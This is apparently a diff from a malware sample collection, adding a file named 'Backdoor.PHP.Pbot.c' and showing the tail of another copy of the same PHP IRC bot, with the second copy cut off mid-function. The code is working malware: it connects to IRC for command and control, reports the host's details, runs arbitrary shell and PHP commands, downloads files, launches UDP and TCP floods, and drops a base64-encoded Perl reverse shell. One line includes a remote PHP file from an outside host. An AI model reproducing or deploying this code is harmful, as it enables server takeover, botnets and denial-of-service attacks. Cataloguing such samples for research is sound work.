* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
* .raw <cmd> //raw IRC command
* .rndnick //change nickname
* .pscan <host> <port> //port scan
* .safe // test safe_mode (dvl)
* .inbox <to> // test inbox (dvl)
* .conback <ip> <port> // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)
*
*/
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
var $config = array("server"=>"irc.dal.net",
"port"=>"7000",
"pass"=>"",
"prefix"=>"aisen",
"maxrand"=>"2",
"chan"=>"#waktu",
"chan2"=>"#majene",
"key"=>"1988",
"modes"=>"+ps",
"password"=>"1988",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@xdevil.org>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#korban. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
case "vunl":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #korban.");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
break;
case "udpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
$bot = new pBot;
$bot->start();
?>
<?php include("http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt");?>

516
PHP/Backdoor.PHP.Pbot.c Normal file
View File

@ -0,0 +1,516 @@
<?
/*
*
* #korban. since 2003
* edited by: devil__ <admin@xdevil.org>
*
* COMMANDS:
*
* .user <password> //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail <to> <from> <subject> <msg> //send an email
* .dns <IP|HOST> //dns lookup
* .download <URL> <filename> //download a file
* .exec <cmd> // uses exec() //execute a command
* .sexec <cmd> // uses shell_exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .info //get system information
* .php <php code> // uses eval() //execute php code
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
* .raw <cmd> //raw IRC command
* .rndnick //change nickname
* .pscan <host> <port> //port scan
* .safe // test safe_mode (dvl)
* .inbox <to> // test inbox (dvl)
* .conback <ip> <port> // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)
*
*/
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
var $config = array("server"=>"irc.dal.net",
"port"=>"7000",
"pass"=>"",
"prefix"=>"aisen",
"maxrand"=>"2",
"chan"=>"#aisen",
"chan2"=>"#aisen",
"key"=>"1988",
"modes"=>"+ps",
"password"=>"1988",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@xdevil.org>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#korban. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
case "vunl":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #korban.");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
break;
case "udpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
